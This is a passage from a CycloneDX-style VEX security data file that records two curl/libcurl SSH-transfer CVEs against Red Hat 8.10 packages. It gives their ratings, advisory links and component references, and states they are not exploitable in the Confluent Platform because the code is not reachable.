          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15079",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 5.3,
          "severity": "medium",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 8.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        297
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and setting the\nknown_hosts file, libcurl could still mistakenly accept connecting to hosts\n*not present* in the specified file if they were added as recognized in the\nlibssh *global* known_hosts file.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15079"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/6"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15079"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15079.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-7q9p-cx8r-rh2q"
        },
        {
          "url": "https://hackerone.com/reports/3477116"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15079"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15079"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:03+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
      "analysis": {
        "state": "not_affected",
        "justification": "code_not_reachable",
        "response": [
          "update"
        ],
        "detail": "This issue is not exploitable in the Confluent Platform. This issue will be addressed in an upcoming quarterly patch release if an updated package is available from the vendor. The affected component is an operating-system base-image package that the product's application code does not use, so the vulnerable code path is not reachable."
      }
    },
    {
      "id": "CVE-2025-15224",
      "ratings": [
        {
          "source": {
            "name": "amazon"
          },
          "severity": "medium"
        },
        {
          "source": {
            "name": "julia"
          },
          "score": 3.1,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:N/I:L/A:N"
        },
        {
          "source": {
            "name": "photon"
          },
          "severity": "low"
        },
        {
          "source": {
            "name": "redhat"
          },
          "score": 4.7,
          "severity": "low",
          "method": "CVSSv31",
          "vector": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N"
        },
        {
          "source": {
            "name": "ubuntu"
          },
          "severity": "low"
        }
      ],
      "cwes": [
        287
      ],
      "description": "When doing SSH-based transfers using either SCP or SFTP, and asked to do\npublic key authentication, curl would wrongly still ask and authenticate using\na locally running SSH agent.",
      "advisories": [
        {
          "url": "https://avd.aquasec.com/nvd/cve-2025-15224"
        },
        {
          "url": "http://www.openwall.com/lists/oss-security/2026/01/07/7"
        },
        {
          "url": "https://access.redhat.com/security/cve/CVE-2025-15224"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.html"
        },
        {
          "url": "https://curl.se/docs/CVE-2025-15224.json"
        },
        {
          "url": "https://github.com/advisories/GHSA-hccr-q52r-4w88"
        },
        {
          "url": "https://hackerone.com/reports/3480925"
        },
        {
          "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-15224"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-1"
        },
        {
          "url": "https://ubuntu.com/security/notices/USN-8062-2"
        },
        {
          "url": "https://www.cve.org/CVERecord?id=CVE-2025-15224"
        }
      ],
      "published": "2026-01-08T10:15:47+00:00",
      "updated": "2026-06-17T08:37:24+00:00",
      "affects": [
        {
          "ref": "pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10",
          "versions": [
            {
              "version": "7.61.1-34.el8_10.11",
              "status": "affected"
            }
          ]
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:77be1b45-0032-4592-b64e-28a2a6209e85/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0ec03d22-f1f0-43ca-9881-db8ce7789cb8/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:0074a708-6d0c-4e92-bcee-de479d132a9e/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d9563237-0318-4775-9971-7f3e7fe82713/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5cd928b4-9283-4d18-8770-7ac5126adf5b/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:4df99559-f1e6-44b5-aea1-d8e1efe66bb4/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:2b188d42-64c9-42dc-aa70-8d6b7a0c05f3/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:248b0aee-6483-4d91-bbf1-fadc14596733/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:3ac64bcb-7b78-45af-a3e0-c0426ccda759/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b8e83e7f-3162-469d-9f55-51bdc04e0a46/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:d41f553c-295c-4111-b7e7-f45887522241/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:5e559e13-3588-4b39-a795-8f22d918f9cc/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:e484a20e-ace3-4670-b007-26b75c05e02d/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ea0043d5-aa37-4a91-b2c2-370f23a804ed/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:f1eabc1a-d3bc-4861-b423-18599026a397/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:b6af335d-5636-4a13-8101-c8f2514e3585/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:a5753d79-53e3-4330-a1d0-b369e13564fa/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:ead82436-9087-4cdb-b83c-fea6029fb2a1/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:094ce4b1-86e3-48a8-85a3-08bf487e74de/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:7f4d6e0c-c98c-45a9-b9fd-d17744d62907/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/curl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        },
        {
          "ref": "urn:cdx:be61c518-d923-4fab-b79f-208cd636171a/1#pkg:rpm/redhat/libcurl@7.61.1-34.el8_10.11?arch=x86_64&distro=redhat-8.10"
        }
      ],
